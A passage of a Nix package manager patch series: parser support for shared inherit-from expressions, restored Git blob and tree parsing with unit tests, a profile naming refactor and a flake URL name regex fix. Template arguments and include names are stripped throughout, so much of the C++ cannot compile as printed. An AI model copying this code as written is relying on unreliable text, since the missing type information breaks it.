@@ -118,13 +118,24 @@ inline void ParserState::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr *
             auto ae = dynamic_cast(e);
             auto jAttrs = dynamic_cast(j->second.e);
             if (jAttrs && ae) {
+                if (ae->inheritFromExprs && !jAttrs->inheritFromExprs)
+                    jAttrs->inheritFromExprs = std::make_unique>();
                 for (auto & ad : ae->attrs) {
                     auto j2 = jAttrs->attrs.find(ad.first);
                     if (j2 != jAttrs->attrs.end()) // Attr already defined in iAttrs, error.
                         dupAttr(ad.first, j2->second.pos, ad.second.pos);
                     jAttrs->attrs.emplace(ad.first, ad.second);
+                    if (ad.second.kind == ExprAttrs::AttrDef::Kind::InheritedFrom) {
+                        auto & sel = dynamic_cast(*ad.second.e);
+                        auto & from = dynamic_cast(*sel.e);
+                        from.displ += jAttrs->inheritFromExprs->size();
+                    }
                 }
                 jAttrs->dynamicAttrs.insert(jAttrs->dynamicAttrs.end(), ae->dynamicAttrs.begin(), ae->dynamicAttrs.end());
+                if (ae->inheritFromExprs) {
+                    jAttrs->inheritFromExprs->insert(jAttrs->inheritFromExprs->end(),
+                        ae->inheritFromExprs->begin(), ae->inheritFromExprs->end());
+                }
             } else {
                 dupAttr(attrPath, pos, j->second.pos);
             }
diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y
index 0898b81f7..b0aee7b41 100644
--- a/src/libexpr/parser.y
+++ b/src/libexpr/parser.y
@@ -321,14 +321,17 @@ binds
     }
   | binds INHERIT '(' expr ')' attrs ';'
     { $$ = $1;
-      /* !!! Should ensure sharing of the expression in $4. */
+      if (!$$->inheritFromExprs)
+          $$->inheritFromExprs = std::make_unique>();
+      $$->inheritFromExprs->push_back($4);
+      auto from = new nix::ExprInheritFrom(state->at(@4), $$->inheritFromExprs->size() - 1);
       for (auto & i : *$6) {
           if ($$->attrs.find(i.symbol) != $$->attrs.end())
               state->dupAttr(i.symbol, state->at(@6), $$->attrs[i.symbol].pos);
           $$->attrs.emplace(
               i.symbol,
               ExprAttrs::AttrDef(
-                  new ExprSelect(CUR_POS, $4, i.symbol),
+                  new ExprSelect(CUR_POS, from, i.symbol),
                   state->at(@6),
                   ExprAttrs::AttrDef::Kind::InheritedFrom));
       }
diff --git a/tests/functional/lang/eval-okay-inherit-from.err.exp b/tests/functional/lang/eval-okay-inherit-from.err.exp
index 51881205b..3227501f2 100644
--- a/tests/functional/lang/eval-okay-inherit-from.err.exp
+++ b/tests/functional/lang/eval-okay-inherit-from.err.exp
@@ -1,2 +1 @@
 trace: used
-trace: used
diff --git a/tests/functional/lang/eval-okay-inherit-from.exp b/tests/functional/lang/eval-okay-inherit-from.exp
index 43bd0e899..024daff6b 100644
--- a/tests/functional/lang/eval-okay-inherit-from.exp
+++ b/tests/functional/lang/eval-okay-inherit-from.exp
@@ -1 +1 @@
-[ 1 2 { __overrides = { y = { d = [ ]; }; }; c = [ ]; d = 4; x = { c = [ ]; }; y = «repeated»; } ]
+[ 1 2 { __overrides = { y = { d = [ ]; }; }; c = [ ]; d = 4; x = { c = [ ]; }; y = «repeated»; } { inner = { c = 3; d = 4; }; } ]
diff --git a/tests/functional/lang/eval-okay-inherit-from.nix b/tests/functional/lang/eval-okay-inherit-from.nix
index d1fad7d69..b72a1c639 100644
--- a/tests/functional/lang/eval-okay-inherit-from.nix
+++ b/tests/functional/lang/eval-okay-inherit-from.nix
@@ -2,5 +2,15 @@ let
   inherit (builtins.trace "used" { a = 1; b = 2; }) a b;
   x.c = 3;
   y.d = 4;
+
+  merged = {
+    inner = {
+      inherit (y) d;
+    };
+
+    inner = {
+      inherit (x) c;
+    };
+  };
 in
-  [ a b rec { x.c = []; inherit (x) c; inherit (y) d; __overrides.y.d = []; } ]
+  [ a b rec { x.c = []; inherit (x) c; inherit (y) d; __overrides.y.d = []; } merged ]

From 1cd87b7042d14aae1fafa47b1c28db4c5bd20de7 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 26 Feb 2024 15:33:52 +0100
Subject: [PATCH 518/654] remove ExprAttrs::AttrDef::inherited

it's no longer widely used and has a rather confusing meaning now that
inherit-from is handled very differently.
---
 src/libexpr/eval.cc         | 2 +-
 src/libexpr/nixexpr.hh      | 2 --
 src/libexpr/parser-state.hh | 2 +-
 3 files changed, 2 insertions(+), 4 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index a353571af..2e7c8207c 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -1220,7 +1220,7 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v)
         Displacement displ = 0;
         for (auto & i : attrs) {
             Value * vAttr;
-            if (hasOverrides && !i.second.inherited()) {
+            if (hasOverrides && i.second.kind != AttrDef::Kind::Inherited) {
                 vAttr = state.allocValue();
                 mkThunk(*vAttr, *i.second.chooseByKind(&env2, &env, inheritEnv), i.second.e);
             } else
diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh
index 4bb2ee2f9..2390c4286 100644
--- a/src/libexpr/nixexpr.hh
+++ b/src/libexpr/nixexpr.hh
@@ -189,8 +189,6 @@ struct ExprAttrs : Expr
             : kind(kind), e(e), pos(pos) { };
         AttrDef() { };
 
-        bool inherited() const { return kind == Kind::Inherited; }
-
         template
         const T & chooseByKind(const T & plain, const T & inherited, const T & inheritedFrom) const
         {
diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh
index 9aa18a0ae..34aef661f 100644
--- a/src/libexpr/parser-state.hh
+++ b/src/libexpr/parser-state.hh
@@ -89,7 +89,7 @@ inline void ParserState::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr *
         if (i->symbol) {
             ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol);
             if (j != attrs->attrs.end()) {
-                if (!j->second.inherited()) {
+                if (j->second.kind != ExprAttrs::AttrDef::Kind::Inherited) {
                     ExprAttrs * attrs2 = dynamic_cast(j->second.e);
                     if (!attrs2) dupAttr(attrPath, pos, j->second.pos);
                     attrs = attrs2;

From f24e445bc024cfd3c26be5f061280af549321c22 Mon Sep 17 00:00:00 2001
From: pennae <82953136+pennae@users.noreply.github.com>
Date: Mon, 26 Feb 2024 15:43:51 +0100
Subject: [PATCH 519/654] add doc comment justifying ExprInheritFrom

Co-authored-by: Robert Hensing 
---
 src/libexpr/nixexpr.hh | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh
index 2390c4286..94356759b 100644
--- a/src/libexpr/nixexpr.hh
+++ b/src/libexpr/nixexpr.hh
@@ -135,6 +135,11 @@ struct ExprVar : Expr
     COMMON_METHODS
 };
 
+/**
+ * A pseudo-expression for the purpose of evaluating the `from` expression in `inherit (from)` syntax.
+ * Unlike normal variable references, the displacement is set during parsing, and always refers to
+ * `ExprAttrs::inheritFromExprs` (by itself or in `ExprLet`), whose values are put into their own `Env`.
+ */
 struct ExprInheritFrom : ExprVar
 {
     ExprInheritFrom(PosIdx pos, Displacement displ): ExprVar(pos, {})

From d28a240aa66acaa7691c8d56054cc9fd4c7fd8f3 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Mon, 26 Feb 2024 21:06:07 +0100
Subject: [PATCH 520/654] profile: extract getNameFromElement

---
 src/nix/profile.cc | 17 +++++++++++------
 1 file changed, 11 insertions(+), 6 deletions(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index fc669d5ed..e04ae008d 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -101,6 +101,15 @@ struct ProfileElement
     }
 };
 
+std::string getNameFromElement(const ProfileElement & element)
+{
+    std::optional result = std::nullopt;
+    if (element.source) {
+        result = getNameFromURL(parseURL(element.source->to_string()));
+    }
+    return result.value_or(element.identifier());
+}
+
 struct ProfileManifest
 {
     using ProfileElementName = std::string;
@@ -189,12 +198,8 @@ struct ProfileManifest
 
     void addElement(ProfileElement element)
     {
-        auto name =
-            element.source
-            ? getNameFromURL(parseURL(element.source->to_string()))
-            : std::nullopt;
-        auto name2 = name ? *name : element.identifier();
-        addElement(name2, std::move(element));
+        auto name = getNameFromElement(element);
+        addElement(name, std::move(element));
     }
 
     nlohmann::json toJSON(Store & store) const

From be0052b45fb1da5018c640157fc0cef95185c5bb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Tue, 27 Feb 2024 06:39:30 +0100
Subject: [PATCH 521/654] Revert "Remove dead Git code"

---
 src/libutil/fs-sink.cc    |  46 ++++++
 src/libutil/fs-sink.hh    |   7 +
 src/libutil/git.cc        | 289 ++++++++++++++++++++++++++++++++++++++
 src/libutil/git.hh        | 152 ++++++++++++++++++++
 tests/unit/libutil/git.cc | 205 +++++++++++++++++++++++++++
 5 files changed, 699 insertions(+)

diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc
index 0ebd750f6..35ce0ac36 100644
--- a/src/libutil/fs-sink.cc
+++ b/src/libutil/fs-sink.cc
@@ -5,6 +5,52 @@
 
 namespace nix {
 
+void copyRecursive(
+    SourceAccessor & accessor, const CanonPath & from,
+    FileSystemObjectSink & sink, const Path & to)
+{
+    auto stat = accessor.lstat(from);
+
+    switch (stat.type) {
+    case SourceAccessor::tSymlink:
+    {
+        sink.createSymlink(to, accessor.readLink(from));
+        break;
+    }
+
+    case SourceAccessor::tRegular:
+    {
+        sink.createRegularFile(to, [&](CreateRegularFileSink & crf) {
+            if (stat.isExecutable)
+                crf.isExecutable();
+            accessor.readFile(from, crf, [&](uint64_t size) {
+                crf.preallocateContents(size);
+            });
+        });
+        break;
+    }
+
+    case SourceAccessor::tDirectory:
+    {
+        sink.createDirectory(to);
+        for (auto & [name, _] : accessor.readDirectory(from)) {
+            copyRecursive(
+                accessor, from / name,
+                sink, to + "/" + name);
+            break;
+        }
+        break;
+    }
+
+    case SourceAccessor::tMisc:
+        throw Error("file '%1%' has an unsupported type", from);
+
+    default:
+        abort();
+    }
+}
+
+
 struct RestoreSinkSettings : Config
 {
     Setting preallocateContents{this, false, "preallocate-contents",
diff --git a/src/libutil/fs-sink.hh b/src/libutil/fs-sink.hh
index 670b55c2b..ae577819a 100644
--- a/src/libutil/fs-sink.hh
+++ b/src/libutil/fs-sink.hh
@@ -41,6 +41,13 @@ struct FileSystemObjectSink
     virtual void createSymlink(const Path & path, const std::string & target) = 0;
 };
 
+/**
+ * Recursively copy file system objects from the source into the sink.
+ */
+void copyRecursive(
+    SourceAccessor & accessor, const CanonPath & sourcePath,
+    FileSystemObjectSink & sink, const Path & destPath);
+
 /**
  * Ignore everything and do nothing
  */
diff --git a/src/libutil/git.cc b/src/libutil/git.cc
index 029e1af44..5733531fa 100644
--- a/src/libutil/git.cc
+++ b/src/libutil/git.cc
@@ -5,13 +5,302 @@
 #include 
 #include  // for strcasecmp
 
+#include "signals.hh"
+#include "config.hh"
+#include "hash.hh"
+#include "posix-source-accessor.hh"
+
 #include "git.hh"
+#include "serialise.hh"
 
 namespace nix::git {
 
 using namespace nix;
 using namespace std::string_literals;
 
+std::optional decodeMode(RawMode m) {
+    switch (m) {
+        case (RawMode) Mode::Directory:
+        case (RawMode) Mode::Executable:
+        case (RawMode) Mode::Regular:
+        case (RawMode) Mode::Symlink:
+            return (Mode) m;
+        default:
+            return std::nullopt;
+    }
+}
+
+
+static std::string getStringUntil(Source & source, char byte)
+{
+    std::string s;
+    char n[1];
+    source(std::string_view { n, 1 });
+    while (*n != byte) {
+        s += *n;
+        source(std::string_view { n, 1 });
+    }
+    return s;
+}
+
+
+static std::string getString(Source & source, int n)
+{
+    std::string v;
+    v.resize(n);
+    source(v);
+    return v;
+}
+
+void parseBlob(
+    FileSystemObjectSink & sink,
+    const Path & sinkPath,
+    Source & source,
+    bool executable,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    xpSettings.require(Xp::GitHashing);
+
+    sink.createRegularFile(sinkPath, [&](auto & crf) {
+        if (executable)
+            crf.isExecutable();
+
+        unsigned long long size = std::stoi(getStringUntil(source, 0));
+
+        crf.preallocateContents(size);
+
+        unsigned long long left = size;
+        std::string buf;
+        buf.reserve(65536);
+
+        while (left) {
+            checkInterrupt();
+            buf.resize(std::min((unsigned long long)buf.capacity(), left));
+            source(buf);
+            crf(buf);
+            left -= buf.size();
+        }
+    });
+}
+
+void parseTree(
+    FileSystemObjectSink & sink,
+    const Path & sinkPath,
+    Source & source,
+    std::function hook,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    unsigned long long size = std::stoi(getStringUntil(source, 0));
+    unsigned long long left = size;
+
+    sink.createDirectory(sinkPath);
+
+    while (left) {
+        std::string perms = getStringUntil(source, ' ');
+        left -= perms.size();
+        left -= 1;
+
+        RawMode rawMode = std::stoi(perms, 0, 8);
+        auto modeOpt = decodeMode(rawMode);
+        if (!modeOpt)
+            throw Error("Unknown Git permission: %o", perms);
+        auto mode = std::move(*modeOpt);
+
+        std::string name = getStringUntil(source, '\0');
+        left -= name.size();
+        left -= 1;
+
+        std::string hashs = getString(source, 20);
+        left -= 20;
+
+        Hash hash(HashAlgorithm::SHA1);
+        std::copy(hashs.begin(), hashs.end(), hash.hash);
+
+        hook(name, TreeEntry {
+            .mode = mode,
+            .hash = hash,
+        });
+    }
+}
+
+ObjectType parseObjectType(
+    Source & source,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    xpSettings.require(Xp::GitHashing);
+
+    auto type = getString(source, 5);
+
+    if (type == "blob ") {
+        return ObjectType::Blob;
+    } else if (type == "tree ") {
+        return ObjectType::Tree;
+    } else throw Error("input doesn't look like a Git object");
+}
+
+void parse(
+    FileSystemObjectSink & sink,
+    const Path & sinkPath,
+    Source & source,
+    bool executable,
+    std::function hook,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    xpSettings.require(Xp::GitHashing);
+
+    auto type = parseObjectType(source, xpSettings);
+
+    switch (type) {
+    case ObjectType::Blob:
+        parseBlob(sink, sinkPath, source, executable, xpSettings);
+        break;
+    case ObjectType::Tree:
+        parseTree(sink, sinkPath, source, hook, xpSettings);
+        break;
+    default:
+        assert(false);
+    };
+}
+
+
+std::optional convertMode(SourceAccessor::Type type)
+{
+    switch (type) {
+    case SourceAccessor::tSymlink:   return Mode::Symlink;
+    case SourceAccessor::tRegular:   return Mode::Regular;
+    case SourceAccessor::tDirectory: return Mode::Directory;
+    case SourceAccessor::tMisc:      return std::nullopt;
+    default: abort();
+    }
+}
+
+
+void restore(FileSystemObjectSink & sink, Source & source, std::function hook)
+{
+    parse(sink, "", source, false, [&](Path name, TreeEntry entry) {
+        auto [accessor, from] = hook(entry.hash);
+        auto stat = accessor->lstat(from);
+        auto gotOpt = convertMode(stat.type);
+        if (!gotOpt)
+            throw Error("file '%s' (git hash %s) has an unsupported type",
+                from,
+                entry.hash.to_string(HashFormat::Base16, false));
+        auto & got = *gotOpt;
+        if (got != entry.mode)
+            throw Error("git mode of file '%s' (git hash %s) is %o but expected %o",
+                from,
+                entry.hash.to_string(HashFormat::Base16, false),
+                (RawMode) got,
+                (RawMode) entry.mode);
+        copyRecursive(
+            *accessor, from,
+            sink, name);
+    });
+}
+
+
+void dumpBlobPrefix(
+    uint64_t size, Sink & sink,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    xpSettings.require(Xp::GitHashing);
+    auto s = fmt("blob %d\0"s, std::to_string(size));
+    sink(s);
+}
+
+
+void dumpTree(const Tree & entries, Sink & sink,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    xpSettings.require(Xp::GitHashing);
+
+    std::string v1;
+
+    for (auto & [name, entry] : entries) {
+        auto name2 = name;
+        if (entry.mode == Mode::Directory) {
+            assert(name2.back() == '/');
+            name2.pop_back();
+        }
+        v1 += fmt("%o %s\0"s, static_cast(entry.mode), name2);
+        std::copy(entry.hash.hash, entry.hash.hash + entry.hash.hashSize, std::back_inserter(v1));
+    }
+
+    {
+        auto s = fmt("tree %d\0"s, v1.size());
+        sink(s);
+    }
+
+    sink(v1);
+}
+
+
+Mode dump(
+    SourceAccessor & accessor, const CanonPath & path,
+    Sink & sink,
+    std::function hook,
+    PathFilter & filter,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    auto st = accessor.lstat(path);
+
+    switch (st.type) {
+    case SourceAccessor::tRegular:
+    {
+        accessor.readFile(path, sink, [&](uint64_t size) {
+            dumpBlobPrefix(size, sink, xpSettings);
+        });
+        return st.isExecutable
+            ? Mode::Executable
+            : Mode::Regular;
+    }
+
+    case SourceAccessor::tDirectory:
+    {
+        Tree entries;
+        for (auto & [name, _] : accessor.readDirectory(path)) {
+            auto child = path / name;
+            if (!filter(child.abs())) continue;
+
+            auto entry = hook(child);
+
+            auto name2 = name;
+            if (entry.mode == Mode::Directory)
+                name2 += "/";
+
+            entries.insert_or_assign(std::move(name2), std::move(entry));
+        }
+        dumpTree(entries, sink, xpSettings);
+        return Mode::Directory;
+    }
+
+    case SourceAccessor::tSymlink:
+    case SourceAccessor::tMisc:
+    default:
+        throw Error("file '%1%' has an unsupported type", path);
+    }
+}
+
+
+TreeEntry dumpHash(
+        HashAlgorithm ha,
+        SourceAccessor & accessor, const CanonPath & path, PathFilter & filter)
+{
+    std::function hook;
+    hook = [&](const CanonPath & path) -> TreeEntry {
+        auto hashSink = HashSink(ha);
+        auto mode = dump(accessor, path, hashSink, hook, filter);
+        auto hash = hashSink.finish().first;
+        return {
+            .mode = mode,
+            .hash = hash,
+        };
+    };
+
+    return hook(path);
+}
+
+
 std::optional parseLsRemoteLine(std::string_view line)
 {
     const static std::regex line_regex("^(ref: *)?([^\\s]+)(?:\\t+(.*))?$");
diff --git a/src/libutil/git.hh b/src/libutil/git.hh
index dea351929..d9eb138e1 100644
--- a/src/libutil/git.hh
+++ b/src/libutil/git.hh
@@ -5,8 +5,160 @@
 #include 
 #include 
 
+#include "types.hh"
+#include "serialise.hh"
+#include "hash.hh"
+#include "source-accessor.hh"
+#include "fs-sink.hh"
+
 namespace nix::git {
 
+enum struct ObjectType {
+    Blob,
+    Tree,
+    //Commit,
+    //Tag,
+};
+
+using RawMode = uint32_t;
+
+enum struct Mode : RawMode {
+    Directory = 0040000,
+    Regular = 0100644,
+    Executable = 0100755,
+    Symlink = 0120000,
+};
+
+std::optional decodeMode(RawMode m);
+
+/**
+ * An anonymous Git tree object entry (no name part).
+ */
+struct TreeEntry
+{
+    Mode mode;
+    Hash hash;
+
+    GENERATE_CMP(TreeEntry, me->mode, me->hash);
+};
+
+/**
+ * A Git tree object, fully decoded and stored in memory.
+ *
+ * Directory names must end in a `/` for sake of sorting. See
+ * https://github.com/mirage/irmin/issues/352
+ */
+using Tree = std::map;
+
+/**
+ * Callback for processing a child hash with `parse`
+ *
+ * The function should
+ *
+ * 1. Obtain the file system objects denoted by `gitHash`
+ *
+ * 2. Ensure they match `mode`
+ *
+ * 3. Feed them into the same sink `parse` was called with
+ *
+ * Implementations may seek to memoize resources (bandwidth, storage,
+ * etc.) for the same Git hash.
+ */
+using SinkHook = void(const Path & name, TreeEntry entry);
+
+/**
+ * Parse the "blob " or "tree " prefix.
+ *
+ * @throws if prefix not recognized
+ */
+ObjectType parseObjectType(
+    Source & source,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+void parseBlob(
+    FileSystemObjectSink & sink, const Path & sinkPath,
+    Source & source,
+    bool executable,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+void parseTree(
+    FileSystemObjectSink & sink, const Path & sinkPath,
+    Source & source,
+    std::function hook,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+/**
+ * Helper putting the previous three `parse*` functions together.
+ */
+void parse(
+    FileSystemObjectSink & sink, const Path & sinkPath,
+    Source & source,
+    bool executable,
+    std::function hook,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+/**
+ * Assists with writing a `SinkHook` step (2).
+ */
+std::optional convertMode(SourceAccessor::Type type);
+
+/**
+ * Simplified version of `SinkHook` for `restore`.
+ *
+ * Given a `Hash`, return a `SourceAccessor` and `CanonPath` pointing to
+ * the file system object with that path.
+ */
+using RestoreHook = std::pair(Hash);
+
+/**
+ * Wrapper around `parse` and `RestoreSink`
+ */
+void restore(FileSystemObjectSink & sink, Source & source, std::function hook);
+
+/**
+ * Dumps a single file to a sink
+ *
+ * @param xpSettings for testing purposes
+ */
+void dumpBlobPrefix(
+    uint64_t size, Sink & sink,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+/**
+ * Dumps a representation of a git tree to a sink
+ */
+void dumpTree(
+    const Tree & entries, Sink & sink,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+/**
+ * Callback for processing a child with `dump`
+ *
+ * The function should return the Git hash and mode of the file at the
+ * given path in the accessor passed to `dump`.
+ *
+ * Note that if the child is a directory, its child in must also be so
+ * processed in order to compute this information.
+ */
+using DumpHook = TreeEntry(const CanonPath & path);
+
+Mode dump(
+    SourceAccessor & accessor, const CanonPath & path,
+    Sink & sink,
+    std::function hook,
+    PathFilter & filter = defaultPathFilter,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+/**
+ * Recursively dumps path, hashing as we go.
+ *
+ * A smaller wrapper around `dump`.
+ */
+TreeEntry dumpHash(
+            HashAlgorithm ha,
+            SourceAccessor & accessor, const CanonPath & path,
+            PathFilter & filter = defaultPathFilter);
+
 /**
  * A line from the output of `git ls-remote --symref`.
  *
diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc
index 73bbd049e..76ef86bcf 100644
--- a/tests/unit/libutil/git.cc
+++ b/tests/unit/libutil/git.cc
@@ -9,6 +9,211 @@ namespace nix {
 
 using namespace git;
 
+class GitTest : public CharacterizationTest
+{
+    Path unitTestData = getUnitTestData() + "/git";
+
+public:
+
+    Path goldenMaster(std::string_view testStem) const override {
+        return unitTestData + "/" + testStem;
+    }
+
+    /**
+     * We set these in tests rather than the regular globals so we don't have
+     * to worry about race conditions if the tests run concurrently.
+     */
+    ExperimentalFeatureSettings mockXpSettings;
+
+private:
+
+    void SetUp() override
+    {
+        mockXpSettings.set("experimental-features", "git-hashing");
+    }
+};
+
+TEST(GitMode, gitMode_directory) {
+    Mode m = Mode::Directory;
+    RawMode r = 0040000;
+    ASSERT_EQ(static_cast(m), r);
+    ASSERT_EQ(decodeMode(r), std::optional { m });
+};
+
+TEST(GitMode, gitMode_executable) {
+    Mode m = Mode::Executable;
+    RawMode r = 0100755;
+    ASSERT_EQ(static_cast(m), r);
+    ASSERT_EQ(decodeMode(r), std::optional { m });
+};
+
+TEST(GitMode, gitMode_regular) {
+    Mode m = Mode::Regular;
+    RawMode r = 0100644;
+    ASSERT_EQ(static_cast(m), r);
+    ASSERT_EQ(decodeMode(r), std::optional { m });
+};
+
+TEST(GitMode, gitMode_symlink) {
+    Mode m = Mode::Symlink;
+    RawMode r = 0120000;
+    ASSERT_EQ(static_cast(m), r);
+    ASSERT_EQ(decodeMode(r), std::optional { m });
+};
+
+TEST_F(GitTest, blob_read) {
+    readTest("hello-world-blob.bin", [&](const auto & encoded) {
+        StringSource in { encoded };
+        StringSink out;
+        RegularFileSink out2 { out };
+        ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Blob);
+        parseBlob(out2, "", in, false, mockXpSettings);
+
+        auto expected = readFile(goldenMaster("hello-world.bin"));
+
+        ASSERT_EQ(out.s, expected);
+    });
+}
+
+TEST_F(GitTest, blob_write) {
+    writeTest("hello-world-blob.bin", [&]() {
+        auto decoded = readFile(goldenMaster("hello-world.bin"));
+        StringSink s;
+        dumpBlobPrefix(decoded.size(), s, mockXpSettings);
+        s(decoded);
+        return s.s;
+    });
+}
+
+/**
+ * This data is for "shallow" tree tests. However, we use "real" hashes
+ * so that we can check our test data in a small shell script test test
+ * (`tests/unit/libutil/data/git/check-data.sh`).
+ */
+const static Tree tree = {
+    {
+        "Foo",
+        {
+            .mode = Mode::Regular,
+            // hello world with special chars from above
+            .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
+        },
+    },
+    {
+        "bAr",
+        {
+            .mode = Mode::Executable,
+            // ditto
+            .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
+        },
+    },
+    {
+        "baZ/",
+        {
+            .mode = Mode::Directory,
+            // Empty directory hash
+            .hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", HashAlgorithm::SHA1),
+        },
+    },
+};
+
+TEST_F(GitTest, tree_read) {
+    readTest("tree.bin", [&](const auto & encoded) {
+        StringSource in { encoded };
+        NullFileSystemObjectSink out;
+        Tree got;
+        ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Tree);
+        parseTree(out, "", in, [&](auto & name, auto entry) {
+            auto name2 = name;
+            if (entry.mode == Mode::Directory)
+                name2 += '/';
+            got.insert_or_assign(name2, std::move(entry));
+        }, mockXpSettings);
+
+        ASSERT_EQ(got, tree);
+    });
+}
+
+TEST_F(GitTest, tree_write) {
+    writeTest("tree.bin", [&]() {
+        StringSink s;
+        dumpTree(tree, s, mockXpSettings);
+        return s.s;
+    });
+}
+
+TEST_F(GitTest, both_roundrip) {
+    using File = MemorySourceAccessor::File;
+
+    MemorySourceAccessor files;
+    files.root = File::Directory {
+        .contents {
+            {
+                "foo",
+                File::Regular {
+                    .contents = "hello\n\0\n\tworld!",
+                },
+            },
+            {
+                "bar",
+                File::Directory {
+                    .contents = {
+                        {
+                            "baz",
+                            File::Regular {
+                                .executable = true,
+                                .contents = "good day,\n\0\n\tworld!",
+                            },
+                        },
+                    },
+                },
+            },
+        },
+    };
+
+    std::map cas;
+
+    std::function dumpHook;
+    dumpHook = [&](const CanonPath & path) {
+        StringSink s;
+        HashSink hashSink { HashAlgorithm::SHA1 };
+        TeeSink s2 { s, hashSink };
+        auto mode = dump(
+            files, path, s2, dumpHook,
+            defaultPathFilter, mockXpSettings);
+        auto hash = hashSink.finish().first;
+        cas.insert_or_assign(hash, std::move(s.s));
+        return TreeEntry {
+            .mode = mode,
+            .hash = hash,
+        };
+    };
+
+    auto root = dumpHook(CanonPath::root);
+
+    MemorySourceAccessor files2;
+
+    MemorySink sinkFiles2 { files2 };
+
+    std::function mkSinkHook;
+    mkSinkHook = [&](auto prefix, auto & hash, auto executable) {
+        StringSource in { cas[hash] };
+        parse(
+            sinkFiles2, prefix, in, executable,
+            [&](const Path & name, const auto & entry) {
+                mkSinkHook(
+                    prefix + "/" + name,
+                    entry.hash,
+                    entry.mode == Mode::Executable);
+            },
+            mockXpSettings);
+    };
+
+    mkSinkHook("", root.hash, false);
+
+    ASSERT_EQ(files, files2);
+}
+
 TEST(GitLsRemote, parseSymrefLineWithReference) {
     auto line = "ref: refs/head/main	HEAD";
     auto res = parseLsRemoteLine(line);

From e5d9130a5bb1ee3f2926afff17be4c031ca404a0 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Mon, 26 Feb 2024 21:45:41 +0100
Subject: [PATCH 522/654] Fix extraction of name for defaultPackage URLs

---
 src/libexpr/flake/url-name.cc        | 14 ++++++--------
 tests/unit/libexpr/flake/url-name.cc |  1 +
 2 files changed, 7 insertions(+), 8 deletions(-)

diff --git a/src/libexpr/flake/url-name.cc b/src/libexpr/flake/url-name.cc
index 753f197d5..d62b34552 100644
--- a/src/libexpr/flake/url-name.cc
+++ b/src/libexpr/flake/url-name.cc
@@ -5,13 +5,12 @@
 namespace nix {
 
 static const std::string attributeNamePattern("[a-zA-Z0-9_-]+");
-static const std::regex lastAttributeRegex("(?:" + attributeNamePattern + "\\.)*(?!default)(" + attributeNamePattern +")(\\^.*)?");
+static const std::regex lastAttributeRegex("^((?:" + attributeNamePattern + "\\.)*)(" + attributeNamePattern +")(\\^.*)?$");
 static const std::string pathSegmentPattern("[a-zA-Z0-9_-]+");
 static const std::regex lastPathSegmentRegex(".*/(" + pathSegmentPattern +")");
 static const std::regex secondPathSegmentRegex("(?:" + pathSegmentPattern + ")/(" + pathSegmentPattern +")(?:/.*)?");
 static const std::regex gitProviderRegex("github|gitlab|sourcehut");
 static const std::regex gitSchemeRegex("git($|\\+.*)");
-static const std::regex defaultOutputRegex(".*\\.default($|\\^.*)");
 
 std::optional getNameFromURL(const ParsedURL & url)
 {
@@ -22,8 +21,11 @@ std::optional getNameFromURL(const ParsedURL & url)
         return url.query.at("dir");
 
     /* If the fragment isn't a "default" and contains two attribute elements, use the last one */
-    if (std::regex_match(url.fragment, match, lastAttributeRegex))
-        return match.str(1);
+    if (std::regex_match(url.fragment, match, lastAttributeRegex)
+        && match.str(1) != "defaultPackage."
+        && match.str(2) != "default") {
+        return match.str(2);
+    }
 
     /* If this is a github/gitlab/sourcehut flake, use the repo name */
     if (std::regex_match(url.scheme, gitProviderRegex) && std::regex_match(url.path, match, secondPathSegmentRegex))
@@ -33,10 +35,6 @@ std::optional getNameFromURL(const ParsedURL & url)
     if (std::regex_match(url.scheme, gitSchemeRegex) && std::regex_match(url.path, match, lastPathSegmentRegex))
         return match.str(1);
 
-    /* If everything failed but there is a non-default fragment, use it in full */
-    if (!url.fragment.empty() && !std::regex_match(url.fragment, defaultOutputRegex))
-        return url.fragment;
-
     /* If there is no fragment, take the last element of the path */
     if (std::regex_match(url.path, match, lastPathSegmentRegex))
         return match.str(1);
diff --git a/tests/unit/libexpr/flake/url-name.cc b/tests/unit/libexpr/flake/url-name.cc
index 85387b323..15bc6b111 100644
